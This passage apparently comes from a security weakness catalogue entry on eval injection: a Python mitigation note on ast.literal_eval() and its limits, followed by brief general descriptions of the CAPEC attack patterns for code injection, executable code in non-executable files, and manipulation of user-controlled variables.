Implementation

For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].

CAPEC-242: Code Injection

An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.